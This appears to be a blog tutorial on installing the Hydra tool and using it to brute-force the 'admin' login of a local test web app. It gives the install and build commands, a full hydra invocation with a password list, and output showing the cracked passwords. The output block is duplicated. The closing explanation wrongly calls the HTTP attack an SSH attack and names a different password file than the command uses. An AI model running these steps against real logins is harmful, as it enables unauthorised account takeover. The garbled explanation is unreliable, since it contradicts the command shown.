How to use the command line tool Hydra
Brute force attacks are conducted by trying out different combination of user name and passwords until a successful combination is identified. Hydra is one tool that helps to conduct these attacks.
First, we need to download and configure this tool. To achieve this
First install the relevant libraries that are required to install the tool
sudo apt-get install libssl-dev libssh-dev libidn11-dev
libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev
firebird2.1-dev libncp-dev libncurses5-dev
Once the required updated are done, we than need to download the tool using the below steps
sudo -sH
cd /opt
wget http://www.thc.org/releases/hydra-7.4.2.tar.gz
Once the tool is downloaded, we than need extract and configure the tool using the below steps
tar -xvzf hydra-7.4.2.tar.gz
mv hydra-7.4.2 hydra
rm hydra-7.4.2.tar.gz
cd /opt/hydra
./configure
make
make install
Now the tool is configured and ready for use, next, we will look at a simple step on how we can execute the hydra command to run these test. Assume we have a text file on our desktop with a list of possible passwords, all we have to do is to point the Hydra tool to the specific password file as give below
hydra -l admin -P /home/testuser/Desktop/pass http://localhost/testApp/login.php
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2014-08-02 12:32:51
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[DATA] 3 tasks, 1 server, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking service http-get on port 80
[80][www] host: 127.0.0.1 login: admin password: password
[80][www] host: 127.0.0.1 login: admin password: admin123
[80][www] host: 127.0.0.1 login: admin password: admin
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-08-02 12:32:51
Hydra (http://www.thc.org/thc-hydra) starting at 2014-08-02 12:32:51
[WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https.
[DATA] 3 tasks, 1 server, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking service http-get on port 80
[80][www] host: 127.0.0.1 login: admin password: password
[80][www] host: 127.0.0.1 login: admin password: admin123
[80][www] host: 127.0.0.1 login: admin password: admin
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-08-02 12:32:51
The above command will attack the system on the given URL with the SSH protocol, and try all the combinations of passwords supplied in the files pass.txt (+ empty passwords and passwords the same as the username)
Comments
Post a Comment